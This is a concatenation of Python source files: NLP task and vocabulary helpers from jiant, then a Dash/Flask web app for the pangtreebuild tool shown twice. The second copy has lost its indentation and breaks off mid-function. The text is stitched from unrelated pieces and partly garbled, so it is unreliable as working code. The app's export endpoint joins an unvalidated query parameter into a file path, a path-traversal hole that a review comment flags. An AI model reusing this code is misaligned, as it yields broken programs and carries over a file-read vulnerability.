        task = task_cls(
            task_src_path,
            max_seq_len=args.max_seq_len,
            name=name,
            tokenizer_name=args.tokenizer,
            **task_kw,
        )
        task.load_data()
        utils.maybe_make_dir(os.path.dirname(pkl_path))
        # Fix: context manager for the dump as well (handle was leaked before).
        with open(pkl_path, "wb") as fh:
            pkl.dump(task, fh)
    return task
def get_task_without_loading_data(task_name, args):
    """Construct a Task object without reading its dataset from disk."""
    task_cls, _rel_path, task_kw = TASKS_REGISTRY[task_name]
    return task_cls(
        path=None,
        max_seq_len=args.max_seq_len,
        name=task_name,
        tokenizer_name=args.tokenizer,
        **task_kw,
    )
def get_tasks(args):
    """ Actually build or load (from pickles) the tasks.

    Returns:
        (tasks, pretrain_task_names, target_task_names): `tasks` is the
        de-duplicated union of pretrain and target tasks, sorted by name.
    """
    data_path = args.data_dir
    scratch_path = args.exp_dir
    pretrain_task_names = parse_task_list_arg(args.pretrain_tasks)
    target_task_names = parse_task_list_arg(args.target_tasks)
    # TODO: We don't want diagnostic tasks in train_task_names
    # but want to support glue/superglue task macros.
    pretrain_task_names = list(filter(lambda x: x not in ALL_DIAGNOSTICS, pretrain_task_names))
    # De-duplicate: a task may appear in both the pretrain and target lists.
    task_names = sorted(set(pretrain_task_names + target_task_names))
    assert data_path is not None
    # Fall back to writing preprocessed output next to the raw data.
    scratch_path = scratch_path or data_path
    log.info("Writing pre-preprocessed tasks to %s", scratch_path)
    tasks = []
    for name in task_names:
        task = _get_task(name, args, data_path=data_path, scratch_path=scratch_path)
        tasks.append(task)
        # Count examples, store in example_counts.
        if task.example_counts is None:
            task.count_examples()
        log.info(
            "\tTask '%s': %s",
            task.name,
            " ".join(("|%s|=%d" % kv for kv in task.example_counts.items())),
        )
    log.info("\tFinished loading tasks: %s.", " ".join([task.name for task in tasks]))
    return tasks, pretrain_task_names, target_task_names
def get_words(tasks):
    """Count word and character frequencies over every sentence of every task.

    Args:
        tasks: iterable of Task objects exposing `get_sentences()` and,
            optionally, a `target_sentences` attribute.

    Returns:
        (word2freq, char2freq): defaultdicts mapping token -> count and
        character -> count.
    """
    word2freq, char2freq = defaultdict(int), defaultdict(int)

    def update_vocab_freqs(sentence):
        """Update counts for words (and their characters) in the sentence."""
        for word in sentence:
            word2freq[word] += 1
            for char in word:
                char2freq[char] += 1

    for task in tasks:
        log.info("\tCounting words for task %s.", task.name)
        for sentence in task.get_sentences():
            update_vocab_freqs(sentence)
    # This branch is meant for tasks that have *English* target sentences
    # (or more generally, same language source and target sentences).
    # Tasks with different language source and target sentences should
    # count and return the vocab in a `task.all_labels()` method.
    for task in tasks:
        if hasattr(task, "target_sentences"):
            for sentence in task.target_sentences:
                # Bug fix: this previously called the undefined name
                # `update_target_vocab_freqs`, raising NameError.
                update_vocab_freqs(sentence)
    return word2freq, char2freq
def get_vocab(word2freq, char2freq, max_v_sizes):
    """Build a Vocabulary containing the most frequent words and characters.

    Special tokens go into the "tokens" namespace first, followed by the top
    `max_v_sizes["word"]` words; the top `max_v_sizes["char"]` characters go
    into the "chars" namespace.
    """
    vocab = Vocabulary(counter=None, max_vocab_size=max_v_sizes)
    for special in SPECIALS:
        vocab.add_token_to_namespace(special, "tokens")
    top_words = sorted(word2freq.items(), key=lambda kv: kv[1], reverse=True)
    for word, _ in top_words[: max_v_sizes["word"]]:
        vocab.add_token_to_namespace(word, "tokens")
    top_chars = sorted(char2freq.items(), key=lambda kv: kv[1], reverse=True)
    for char, _ in top_chars[: max_v_sizes["char"]]:
        vocab.add_token_to_namespace(char, "chars")
    return vocab
def add_task_label_vocab(vocab, task):
    """Add custom task labels to a separate namespace.
    If task has a 'get_all_labels' method, call that to get a list of labels
    to populate the <task_name>_labels vocabulary namespace.
    This is the recommended way to implement multiclass models: in your task's
    process_split code, make instances that use LabelFields with the task label
    namespace, e.g.:
    label_namespace = "%s_labels" % self.name
    label = LabelField(label_string, label_namespace=label_namespace)
    This will cause them to be properly indexed by the Vocabulary.
    This can then be accessed when generating Instances, either via a custom
    Indexer or by invoking the namespace when creating a LabelField.
    """
    # Tasks without custom labels have nothing to add.
    if not hasattr(task, "get_all_labels"):
        return
    utils.assert_for_log(
        hasattr(task, "_label_namespace"),
        "Task %s is missing method `_label_namespace`!" % task.name,
    )
    namespace = task._label_namespace
    # A namespace of None means the task opted out of a label vocabulary.
    if namespace is None:
        return
    log.info("\tTask '%s': adding vocab namespace '%s'", task.name, namespace)
    for label in task.get_all_labels():
        vocab.add_token_to_namespace(label, namespace)
def add_bert_wpm_vocab(vocab, bert_model_name):
    """Add BERT WPM vocabulary for use with pre-tokenized data.
    BertTokenizer has a convert_tokens_to_ids method, but this doesn't do
    anything special so we can just use the standard indexers.
    """
    from pytorch_pretrained_bert import BertTokenizer
    # Cased/uncased variants are distinguished by the model name string.
    do_lower_case = "uncased" in bert_model_name
    tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=do_lower_case)
    # Insert tokens in id order so vocab indices line up with wordpiece ids.
    ordered_vocab = tokenizer.convert_ids_to_tokens(range(len(tokenizer.vocab)))
    log.info("BERT WPM vocab (model=%s): %d tokens", bert_model_name, len(ordered_vocab))
    for word in ordered_vocab:
        # The namespace is the model name itself, so different BERT variants
        # don't collide.
        vocab.add_token_to_namespace(word, bert_model_name)
def add_openai_bpe_vocab(vocab, namespace="openai_bpe"):
    """Add OpenAI BPE vocabulary for use with pre-tokenized data."""
    from .openai_transformer_lm import utils as openai_utils
    # Mapping of BPE id -> wordpiece; insert in id order so vocab indices
    # line up with the pretrained model's embedding rows.
    id_to_wordpiece = openai_utils.reverse_encoder_dict
    for i in range(len(id_to_wordpiece)):
        vocab.add_token_to_namespace(id_to_wordpiece[i], namespace)
    # Add SOS and EOS tokens to *end* of namespace, since this is where the
    # OpenAI model expects special tokens.
    # NOTE(review): these come from jiant.utils.utils, not this module's own
    # SOS_TOK/EOS_TOK constants — confirm they are defined there.
    vocab.add_token_to_namespace(utils.SOS_TOK, namespace)
    vocab.add_token_to_namespace(utils.EOS_TOK, namespace)
def add_wsj_vocab(vocab, data_dir, namespace="tokens"):
    """Add WSJ vocabulary for PTB parsing models.

    Args:
        vocab: Vocabulary to add tokens into.
        data_dir: directory containing WSJ/tokens.txt (one token per line).
        namespace: vocabulary namespace to use.
    """
    wsj_vocab_path = os.path.join(data_dir, "WSJ/tokens.txt")
    # To create the tokens.txt file: Run only WSJ LM baseline on jiant, and
    # duplicate the vocab file generated.
    assert os.path.exists(wsj_vocab_path), "WSJ vocab file doesn't exist."
    # Fix: close the file via a context manager (the handle was leaked before)
    # and log the path rather than the raw file object.
    with open(wsj_vocab_path) as wsj_tokens:
        for line in wsj_tokens:
            vocab.add_token_to_namespace(line.strip(), namespace)
    log.info("\tAdded WSJ vocabulary from %s", wsj_vocab_path)
|
import io
import os
import base64
from io import StringIO
from pathlib import Path
from typing import Dict, List
import dash
import dash_html_components as html
import flask
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pangtreebuild.affinity_tree.parameters import Blosum, Hbmin, Stop, P
from pangtreebuild.pangenome.graph import DataType
from pangtreebuild.pangenome.parameters.missings import FromFile, FromNCBI, MissingBase
from pangtreebuild.pangenome.parameters.msa import Maf, Po, MetadataCSV
from pangtreebuild.serialization.json import to_json
from dash_app.components import pangtreebuild, tools
from dash_app.layout.pages import get_task_description_layout
from dash_app.server import app
def get_success_info(message):
    """Return an icon + inline text pair indicating a successful upload."""
    icon = html.I(className="fas fa-check-circle correct")
    text = html.P(message, style={"display": "inline", "margin-left": "10px"})
    return [icon, text]
def get_error_info(message):
    """Return an icon + inline text pair indicating a failed upload."""
    icon = html.I(className="fas fa-exclamation-circle incorrect")
    text = html.P(message, style={"display": "inline", "margin-left": "10px"})
    return [icon, text]
@app.callback([Output("data_type", 'value'),
               Output("metadata_upload", 'filename'),
               Output("metadata_upload", 'contents'),
               Output("multialignment_upload", 'filename'),
               Output("multialignment_upload", 'contents'),
               Output("fasta_provider_choice", "value"),
               Output("fasta_upload", 'filename'),
               Output("fasta_upload", 'contents')],
              [Input("use-toy-button", 'n_clicks'),
               Input("use-ebola_subset-button", 'n_clicks'),
               Input("use-ebola-button", 'n_clicks')])
def get_example(toy_n_clicks, ebola_subset_n_clicks, ebola_n_clicks):
    """Populate the upload widgets with one of the bundled example datasets.

    The triggering button determines which example folder is loaded; examples
    without a bundled fasta fall back to the NCBI fasta provider.
    """
    changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]
    if "toy" in changed_id:
        example_folder = "toy_example"
        metadata_file = "metadata.csv"
        multialignment_file = "f.maf"
        fasta_file = "sequence.fasta"
    elif "ebola_subset" in changed_id:
        # NOTE: must be checked before the plain "ebola" match below.
        example_folder = "ebola_subset"
        metadata_file = "metadata.csv"
        multialignment_file = "multialignment.maf"
        fasta_file = None
    elif "ebola" in changed_id:
        example_folder = "ebola"
        metadata_file = "metadata.csv"
        multialignment_file = "multialignment.maf"
        fasta_file = None
    else:
        # Bug fix: previously the locals stayed unbound (UnboundLocalError)
        # when no known button triggered the callback, e.g. on initial load.
        raise PreventUpdate
    with open(f"example_data/pangtreebuild/{example_folder}/{metadata_file}") as f:
        metadata_content = tools.encode_content(f.read())
    with open(f"example_data/pangtreebuild/{example_folder}/{multialignment_file}") as f:
        multialignment_content = tools.encode_content(f.read())
    if fasta_file:
        fasta_provider_choice = "File"
        with open(f"example_data/pangtreebuild/{example_folder}/{fasta_file}") as f:
            fasta_content = tools.encode_content(f.read())
    else:
        fasta_provider_choice = "NCBI"
        fasta_content = None
    return "Nucleotides", metadata_file, metadata_content, multialignment_file, multialignment_content, fasta_provider_choice, fasta_file, fasta_content
# Metadata Validation
@app.callback(Output("metadata_upload_state", 'data'),
              [Input("metadata_upload", 'contents')],
              [State("metadata_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
    """Validate the uploaded metadata CSV and store the result in the store."""
    if file_content is None or file_name is None:
        return None
    file_content = tools.decode_content(file_content)
    error_message = pangtreebuild.metadata_file_is_valid(file_content, file_name)
    # An empty error message means the file validated cleanly.
    return {"is_correct": not error_message,
            "filename": file_name,
            "error": error_message}
@app.callback(Output("metadata_upload_state_info", 'children'),
              [Input("metadata_upload_state", 'data')])
def show_validation_result(upload_state_data):
    """Render the metadata validation outcome next to the upload control."""
    if not upload_state_data:
        return get_error_info("")
    if upload_state_data["is_correct"]:
        # BUG FIX: the f-string contained a literal "(unknown)" instead of
        # interpolating the uploaded file's name.
        return get_success_info(f"File {upload_state_data['filename']} is uploaded.")
    return get_error_info(upload_state_data["error"])
# Multialignment validation
@app.callback(Output("multialignment_upload_state", 'data'),
              [Input("multialignment_upload", 'contents')],
              [State("multialignment_upload", 'filename')])
def validate_multialignment_file(file_content, file_name):
    """Validate the uploaded multialignment (MAF/PO) file.

    Renamed from validate_metadata_file, which silently shadowed the
    metadata validator defined above (flake8 F811).
    """
    if file_content is None or file_name is None:
        return None
    file_content = tools.decode_content(file_content)
    error_message = pangtreebuild.multialignment_file_is_valid(file_content, file_name)
    return {"is_correct": not error_message,
            "filename": file_name,
            "error": error_message}
@app.callback(Output("multialignment_upload_state_info", 'children'),
              [Input("multialignment_upload_state", 'data')])
def show_multialignment_validation_result(upload_state_data):
    """Render the multialignment validation outcome."""
    if not upload_state_data:
        return get_error_info("")
    if upload_state_data["is_correct"]:
        # BUG FIX: interpolate the real filename instead of "(unknown)".
        return get_success_info(f"File {upload_state_data['filename']} is uploaded.")
    return get_error_info(upload_state_data["error"])
# MAF specific parameters toggling
@app.callback(Output("maf_specific_params", 'is_open'),
              [Input("multialignment_upload_state", 'data')])
def toggle_maf_specific_params(multialignment_upload_state_data):
    """Open the MAF-only parameter section when a MAF file was uploaded."""
    state = multialignment_upload_state_data
    return bool(state) and "maf" in state["filename"]
@app.callback([Output("missing_symbol_param", 'is_open'),
               Output("fasta_upload_param", 'is_open')],
              [Input("fasta_provider_choice", 'value')])
def toggle_missing_symbol_param(fasta_provider_choice):
    """Show the missing-symbol input or the FASTA upload per provider choice.

    Renamed from toggle_mising_symbol_param (typo).
    """
    return fasta_provider_choice == "Symbol", fasta_provider_choice == "File"
# FASTA VALIDATION
@app.callback(Output("fasta_upload_state", 'data'),
              [Input("fasta_upload", 'contents'),
               Input("session_dir", 'data')],
              [State("fasta_upload", 'filename')])
def validate_fasta_file(file_content, session_dir, file_name):
    """Persist the uploaded FASTA (or zipped FASTA) and validate it.

    The upload is written to the session directory because the validator
    operates on a file path, not on in-memory content.
    """
    if file_content is None or file_name is None or session_dir is None:
        return None
    # Decide once whether this is a zip archive instead of re-testing below.
    is_zip = ".zip" in file_name
    if is_zip:
        decoded = tools.decode_zip_content(file_content)
    else:
        decoded = tools.decode_content(file_content)
    fasta_path = tools.get_child_path(Path(session_dir), file_name)
    if is_zip:
        tools.save_to_file(decoded, fasta_path, 'wb')
    else:
        tools.save_to_file(decoded, fasta_path)
    error_message = pangtreebuild.fasta_file_is_valid(fasta_path)
    return {"is_correct": not error_message,
            "filename": file_name,
            "error": error_message}
@app.callback(Output("fasta_upload_state_info", 'children'),
              [Input("fasta_upload_state", 'data')])
def show_fasta_validation_result(upload_state_data):
    """Render the FASTA validation outcome."""
    if not upload_state_data:
        return get_error_info("")
    if upload_state_data["is_correct"]:
        # BUG FIX: interpolate the real filename instead of "(unknown)".
        return get_success_info(f"File {upload_state_data['filename']} is uploaded.")
    return get_error_info(upload_state_data["error"])
@app.callback(Output("blosum_upload_state_info", 'children'),
              [Input("blosum_upload_state", 'data')])
def show_blosum_validation_result(blosum_upload_state_data):
    """Render the BLOSUM matrix validation outcome.

    Renamed from show_validation_result, which shadowed the metadata
    renderer defined above (flake8 F811).  Reuses the shared icon helpers
    instead of duplicating their markup inline.
    """
    if not blosum_upload_state_data:
        return get_success_info("")
    validation_message = blosum_upload_state_data["validation_message"]
    if blosum_upload_state_data["is_correct"]:
        return get_success_info(validation_message)
    return get_error_info(validation_message)
@app.callback([Output("poa_specific_params", 'is_open'),
               Output("tree_specific_params", 'is_open')],
              [Input("consensus_algorithm_choice", 'value')])
def consensus_specific_params(consensus_algorithm_choice):
    """Open the parameter panel matching the chosen consensus algorithm."""
    choice = consensus_algorithm_choice
    return choice == "poa", choice == "tree"
@app.callback(Output("session_dir", 'data'),
              [Input("fasta_upload", 'contents')],
              [State("session_dir", 'data')])
def create_output_dir(_, session_dir):
    """Lazily create a per-session working directory and remember its path."""
    if session_dir is not None:
        return session_dir
    return str(tools.create_output_dir())
@app.callback(
    Output("ebola_collapse", "is_open"),
    [Input("collapse-ebola-button", "n_clicks")],
    [State("ebola_collapse", "is_open")],
)
def toggle_ebola_example_collapse(ebola_btn_clicks, is_open):
    """Toggle the Ebola example description panel on button click."""
    return (not is_open) if ebola_btn_clicks else is_open
@app.callback(
    Output("toy_example_collapse", "is_open"),
    [Input("collapse-toy-example-button", "n_clicks")],
    [State("toy_example_collapse", "is_open")],
)
def toggle_toy_example_collapse(toy_example_btn_clicks, is_open):
    """Toggle the toy example description panel on button click.

    Renamed from toggle_ebola_example_collapse, which shadowed the Ebola
    toggle defined above (flake8 F811).
    """
    if toy_example_btn_clicks:
        return not is_open
    return is_open
@app.callback(
    [Output("session_state", 'data'),
     Output('confirm_run', 'displayed')],
    [Input("pang_button", 'n_clicks')],
    [State("session_state", 'data'),
     State("session_dir", 'data'),
     State("data_type", "value"),
     State("multialignment_upload", "contents"),
     State("multialignment_upload", "filename"),
     State("fasta_provider_choice", "value"),
     State("fasta_upload", "contents"),
     State("fasta_upload", "filename"),
     State("missing_symbol_input", "value"),
     # State("blosum_upload", "contents"),
     # State("blosum_upload", "filename"),
     State("consensus_algorithm_choice", "value"),
     State("output_configuration", "value"),
     State("metadata_upload", "contents"),
     State("metadata_upload", "filename"),
     State("hbmin_input", "value"),
     State("stop_input", "value"),
     State("p_input", "value")],
)
def run_pangenome(run_processing_btn_click,
                  session_state: Dict,
                  session_dir: str,
                  datatype: str,
                  multialignment_content: str,
                  multialignment_filename: str,
                  fasta_provider_choice: str,
                  fasta_content: str,
                  fasta_filename: str,
                  missing_symbol: str,
                  consensus_choice: str,
                  output_config: List[str],
                  metadata_content: str,
                  metadata_filename: str,
                  hbmin_value: float,
                  stop_value: float,
                  p_value: float):
    """Run the full pangtreebuild processing for the configured inputs.

    Returns the new session state (result zip short path, serialized
    pangenome JSON, error message) and whether the "run finished"
    confirmation dialog should be displayed.
    """
    if run_processing_btn_click == 0:
        raise PreventUpdate()
    if session_state is None:
        session_state = {}
    if session_dir is None:
        session_dir = tools.create_output_dir()
    else:
        session_dir = Path(session_dir)
    # Each run gets its own timestamped subdirectory of the session dir.
    current_processing_output_dir_name = tools.get_child_path(session_dir, tools.get_current_time())
    tools.create_dir(current_processing_output_dir_name)
    if multialignment_filename and "maf" in multialignment_filename:
        multialignment = Maf(StringIO(tools.decode_content(multialignment_content)),
                             file_name=multialignment_filename)
    elif multialignment_filename and "po" in multialignment_filename:
        multialignment = Po(StringIO(tools.decode_content(multialignment_content)),
                            file_name=multialignment_filename)
    else:
        session_state["error"] = "Cannot create Poagraph. Only MAF and PO files are supported."
        # BUG FIX: this callback declares two outputs, but the original
        # returned only session_state here, making Dash fail on the error
        # path.  Do not display the confirmation dialog on error.
        return session_state, False
    missing_symbol = MissingBase(missing_symbol) if missing_symbol != "" else MissingBase()
    fasta_path = None
    # NOTE(review): fasta_provider stays unbound when fasta_provider_choice
    # is "Symbol" — confirm whether that choice can reach this callback.
    if fasta_provider_choice == "NCBI":
        fasta_provider = FromNCBI(use_cache=True)
    elif fasta_provider_choice == "File":
        fasta_path = tools.get_child_path(current_processing_output_dir_name,
                                          fasta_filename).resolve()
        # Zipped uploads must be decoded and written as binary.
        if "zip" in fasta_filename:
            tools.save_to_file(tools.decode_zip_content(fasta_content), fasta_path, "wb")
        else:
            tools.save_to_file(tools.decode_content(fasta_content), fasta_path, "w")
        fasta_provider = FromFile(fasta_path)
    blosum_path = pangtreebuild.get_default_blosum_path()
    blosum_contents = tools.read_file_to_stream(blosum_path)
    blosum = Blosum(blosum_contents, blosum_path)
    metadata = MetadataCSV(StringIO(tools.decode_content(metadata_content)),
                           metadata_filename) if metadata_content else None
    pangenomejson = pangtreebuild.run_pangtreebuild(
        output_dir=current_processing_output_dir_name,
        datatype=DataType[datatype],
        multialignment=multialignment,
        fasta_provider=fasta_provider,
        blosum=blosum,
        consensus_choice=consensus_choice,
        output_po="po" in output_config,
        output_fasta="fasta" in output_config,
        output_newick="newick" in output_config,
        missing_symbol=missing_symbol,
        metadata=metadata,
        hbmin=Hbmin(hbmin_value) if hbmin_value else None,
        stop=Stop(stop_value) if stop_value else None,
        p=P(p_value) if p_value else None,
        fasta_path=fasta_filename if fasta_filename else None,
        include_nodes=True  # if "nodes" in output_config else False
    )
    pangenome_json_str = to_json(pangenomejson)
    current_processing_output_zip = tools.dir_to_zip(current_processing_output_dir_name)
    # Keep only "<timestamp dir>/<zip name>" for the download endpoint.
    current_processing_short_name = "/".join(str(current_processing_output_zip).split("/")[-2:])
    return {"last_output_zip": current_processing_short_name,
            "jsonpangenome": pangenome_json_str,
            "error": ""}, True
@app.callback(Output("download_processing_result", "href"),
              [Input("session_state", 'data')])
def update_download_result_content(session_state_data):
    """Expose the last produced result ZIP as a download link."""
    if session_state_data is None:
        raise PreventUpdate()
    if "last_output_zip" not in session_state_data:
        return ""
    # BUG FIX: the original nested single quotes inside a single-quoted
    # f-string, which is a SyntaxError before Python 3.12.
    return f"/export/pang?n={session_state_data['last_output_zip']}"
@app.server.route('/export/pang')
def export_pang_result_zip():
    """Flask endpoint that streams a previously generated result ZIP.

    Query parameter ``n`` is the "<timestamp dir>/<zip name>" short path
    produced by run_pangenome and stored in session_state["last_output_zip"].
    """
    zip_short_path = flask.request.args.get('n')
    # Results live under users_temp_data/, two levels above this module.
    # NOTE(review): zip_short_path comes straight from the query string; a
    # ".." value escapes users_temp_data (path traversal) — consider validating.
    zip_full_path = Path(os.path.abspath(os.path.join(os.path.dirname(__file__)))).joinpath(
        "../../users_temp_data/").joinpath(zip_short_path)
    # Read the ZIP fully into memory so the file handle is closed before the
    # response is streamed.
    with open(zip_full_path, 'rb') as f:
        data = io.BytesIO(f.read())
    data.seek(0)
    result_id = zip_short_path.split("/")[1]
    # NOTE(review): attachment_filename/cache_timeout are pre-Flask-2.0
    # parameter names (renamed download_name/max_age) — confirm pinned Flask.
    return flask.send_file(
        data,
        mimetype='application/zip',
        attachment_filename=f'result_{result_id}',
        as_attachment=True,
        cache_timeout=0
    )
@app.callback(Output("poapangenome_result", "is_open"),
              [Input("session_state", 'data')])
def open_poapangenome_result(session_state_data):
    """Open the result section once a serialized pangenome is available."""
    return session_state_data is not None and "jsonpangenome" in session_state_data
@app.callback(Output("poapangenome_result_description", "children"),
              [Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
    """Build the textual task summary for the finished processing run."""
    if session_state_data is None or "jsonpangenome" not in session_state_data:
        return []
    jsonpangenome = tools.unjsonify_jsonpangenome(session_state_data["jsonpangenome"])
    return get_task_description_layout(jsonpangenome)
@app.callback(Output("result_icon", "className"),
              [Input("session_state", 'data')])
def get_result_icon_class(session_state_data):
    """Pick the success/failure icon class for the last processing run.

    Renamed from get_poapangenome_result_description, which shadowed the
    description callback defined above (flake8 F811).
    """
    if session_state_data is None or "jsonpangenome" not in session_state_data:
        return ""
    if session_state_data["error"]:
        return "fas fa-times-circle incorrect"
    return "fas fa-check-circle correct"
| import io
import os
import base64
from io import StringIO
from pathlib import Path
from typing import Dict, List
import dash
import dash_html_components as html
import flask
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pangtreebuild.affinity_tree.parameters import Blosum, Hbmin, Stop, P
from pangtreebuild.pangenome.graph import DataType
from pangtreebuild.pangenome.parameters.missings import FromFile, FromNCBI, MissingBase
from pangtreebuild.pangenome.parameters.msa import Maf, Po, MetadataCSV
from pangtreebuild.serialization.json import to_json
from dash_app.components import pangtreebuild, tools
from dash_app.layout.pages import get_task_description_layout
from dash_app.server import app
def get_success_info(message):
return [html.I(className="fas fa-check-circle correct"),
html.P(message, style={"display": "inline", "margin-left": "10px"})]
def get_error_info(message):
return [html.I(className="fas fa-exclamation-circle incorrect"),
html.P(message, style={"display": "inline", "margin-left": "10px"})]
@app.callback([Output("data_type", 'value'),
Output("metadata_upload", 'filename'),
Output("metadata_upload", 'contents'),
Output("multialignment_upload", 'filename'),
Output("multialignment_upload", 'contents'),
Output("fasta_provider_choice", "value"),
Output("fasta_upload", 'filename'),
Output("fasta_upload", 'contents')],
[Input("use-toy-button", 'n_clicks'),
Input("use-ebola_subset-button", 'n_clicks'),
Input("use-ebola-button", 'n_clicks')])
def get_example(toy_n_clicks, ebola_subset_n_clicks, ebola_n_clicks):
changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]
if "toy" in changed_id:
example_folder = "toy_example"
metadata_file = "metadata.csv"
multialignment_file = "f.maf"
fasta_file = "sequence.fasta"
elif "ebola_subset" in changed_id:
example_folder = "ebola_subset"
metadata_file = "metadata.csv"
multialignment_file = "multialignment.maf"
fasta_file = None
elif "ebola" in changed_id:
example_folder = "ebola"
metadata_file = "metadata.csv"
multialignment_file = "multialignment.maf"
fasta_file = None
with open(f"example_data/pangtreebuild/{example_folder}/{metadata_file}") as f:
metadata_content = tools.encode_content(f.read())
with open(f"example_data/pangtreebuild/{example_folder}/{multialignment_file}") as f:
multialignment_content = tools.encode_content(f.read())
if fasta_file:
fasta_provider_choice = "File"
with open(f"example_data/pangtreebuild/{example_folder}/{fasta_file}") as f:
fasta_content = tools.encode_content(f.read())
else:
fasta_provider_choice = "NCBI"
fasta_content = None
return "Nucleotides", metadata_file, metadata_content, multialignment_file, multialignment_content, fasta_provider_choice, fasta_file, fasta_content
# Metadata Validation
@app.callback(Output("metadata_upload_state", 'data'),
[Input("metadata_upload", 'contents')],
[State("metadata_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
if file_content is None or file_name is None:
return None
file_content = tools.decode_content(file_content)
error_message = pangtreebuild.metadata_file_is_valid(file_content, file_name)
is_file_correct = True if len(error_message) == 0 else False
return {"is_correct": is_file_correct, "filename": file_name, "error": error_message}
@app.callback(Output("metadata_upload_state_info", 'children'),
              [Input("metadata_upload_state", 'data')])
def show_validation_result(upload_state_data):
    """Render the metadata validation outcome next to the upload control."""
    if not upload_state_data:
        return get_error_info("")
    if upload_state_data["is_correct"]:
        # BUG FIX: interpolate the real filename instead of "(unknown)".
        return get_success_info(f"File {upload_state_data['filename']} is uploaded.")
    return get_error_info(upload_state_data["error"])
# Multialignment validation
@app.callback(Output("multialignment_upload_state", 'data'),
[Input("multialignment_upload", 'contents')],
[State("multialignment_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
if file_content is None or file_name is None:
return None
else:
file_content = tools.decode_content(file_content)
error_message = pangtreebuild.multialignment_file_is_valid(file_content, file_name)
if len(error_message) == 0:
return {"is_correct": True, "filename": file_name, "error": error_message}
else:
return {"is_correct": False, "filename": file_name, "error": error_message}
@app.callback(Output("multialignment_upload_state_info", 'children'),
              [Input("multialignment_upload_state", 'data')])
def show_multialignment_validation_result(upload_state_data):
    """Render the multialignment validation outcome."""
    if not upload_state_data:
        return get_error_info("")
    if upload_state_data["is_correct"]:
        # BUG FIX: interpolate the real filename instead of "(unknown)".
        return get_success_info(f"File {upload_state_data['filename']} is uploaded.")
    return get_error_info(upload_state_data["error"])
# MAF specific parameters toggling
@app.callback(Output("maf_specific_params", 'is_open'),
[Input("multialignment_upload_state", 'data')])
def toggle_maf_specific_params(multialignment_upload_state_data):
if multialignment_upload_state_data and "maf" in multialignment_upload_state_data["filename"]:
return True
return False
@app.callback([Output("missing_symbol_param", 'is_open'),
Output("fasta_upload_param", 'is_open')],
[Input("fasta_provider_choice", 'value')])
def toggle_mising_symbol_param(fasta_provider_choice):
return fasta_provider_choice == "Symbol", fasta_provider_choice == "File"
# FASTA VALIDATION
@app.callback(Output("fasta_upload_state", 'data'),
[Input("fasta_upload", 'contents'),
Input("session_dir", 'data')],
[State("fasta_upload", 'filename')])
def validate_fasta_file(file_content, session_dir, file_name):
if file_content is None or file_name is None or session_dir is None:
return None
else:
if ".zip" in file_name:
file_content = tools.decode_zip_content(file_content)
else:
file_content = tools.decode_content(file_content)
output_dir = Path(session_dir)
fasta_path = tools.get_child_path(output_dir, file_name)
if ".zip" in file_name:
tools.save_to_file(file_content, fasta_path, 'wb')
else:
tools.save_to_file(file_content, fasta_path)
error_message = pangtreebuild.fasta_file_is_valid(fasta_path)
if len(error_message) == 0:
return {"is_correct": True, "filename": file_name, "error": error_message}
else:
return {"is_correct": False, "filename": file_name, "error": error_message}
@app.callback(Output("fasta_upload_state_info", 'children'),
              [Input("fasta_upload_state", 'data')])
def show_fasta_validation_result(upload_state_data):
    """Render the FASTA validation outcome."""
    if not upload_state_data:
        return get_error_info("")
    if upload_state_data["is_correct"]:
        # BUG FIX: interpolate the real filename instead of "(unknown)".
        return get_success_info(f"File {upload_state_data['filename']} is uploaded.")
    return get_error_info(upload_state_data["error"])
@app.callback(Output("blosum_upload_state_info", 'children'),
[Input("blosum_upload_state", 'data')])
def show_validation_result(blosum_upload_state_data):
if blosum_upload_state_data is None or len(blosum_upload_state_data) == 0:
return get_success_info("")
else:
validation_message = blosum_upload_state_data["validation_message"]
if blosum_upload_state_data["is_correct"]:
return [html.I(className="fas fa-check-circle correct"),
html.P(f"{validation_message}",
style={"display": "inline", "margin-left": "10px"})]
else:
return [html.I(className="fas fa-exclamation-circle incorrect"),
html.P(f"{validation_message}",
style={"display": "inline", "margin-left": "10px"})]
@app.callback([Output("poa_specific_params", 'is_open'),
Output("tree_specific_params", 'is_open')],
[Input("consensus_algorithm_choice", 'value')])
def consensus_specific_params(consensus_algorithm_choice):
return consensus_algorithm_choice == "poa", consensus_algorithm_choice == "tree"
@app.callback(Output("session_dir", 'data'),
[Input("fasta_upload", 'contents')],
[State("session_dir", 'data')])
def create_output_dir(_, session_dir):
if session_dir is None:
output_dir = tools.create_output_dir()
session_dir = str(output_dir)
return session_dir
@app.callback(
Output("ebola_collapse", "is_open"),
[Input("collapse-ebola-button", "n_clicks")],
[State("ebola_collapse", "is_open")],
)
def toggle_ebola_example_collapse(ebola_btn_clicks, is_open):
if ebola_btn_clicks:
return not is_open
return is_open
@app.callback(
Output("toy_example_collapse", "is_open"),
[Input("collapse-toy-example-button", "n_clicks")],
[State("toy_example_collapse", "is_open")],
)
def toggle_ebola_example_collapse(toy_example_btn_clicks, is_open):
if toy_example_btn_clicks:
return not is_open
return is_open
@app.callback(
[Output("session_state", 'data'),
Output('confirm_run', 'displayed')],
[Input("pang_button", 'n_clicks')],
[State("session_state", 'data'),
State("session_dir", 'data'),
State("data_type", "value"),
State("multialignment_upload", "contents"),
State("multialignment_upload", "filename"),
State("fasta_provider_choice", "value"),
State("fasta_upload", "contents"),
State("fasta_upload", "filename"),
State("missing_symbol_input", "value"),
# State("blosum_upload", "contents"),
# State("blosum_upload", "filename"),
State("consensus_algorithm_choice", "value"),
State("output_configuration", "value"),
State("metadata_upload", "contents"),
State("metadata_upload", "filename"),
State("hbmin_input", "value"),
State("stop_input", "value"),
State("p_input", "value")],
)
def run_pangenome(run_processing_btn_click,
session_state: Dict,
session_dir: str,
datatype: str,
multialignment_content: str,
multialignment_filename: str,
fasta_provider_choice: str,
fasta_content: str,
fasta_filename: str,
missing_symbol: str,
consensus_choice: str,
output_config: List[str],
metadata_content: str,
metadata_filename: str,
hbmin_value: float,
stop_value: float,
p_value: float):
if run_processing_btn_click == 0:
raise PreventUpdate()
if session_state is None:
session_state = {}
if session_dir is None:
session_dir = tools.create_output_dir()
else:
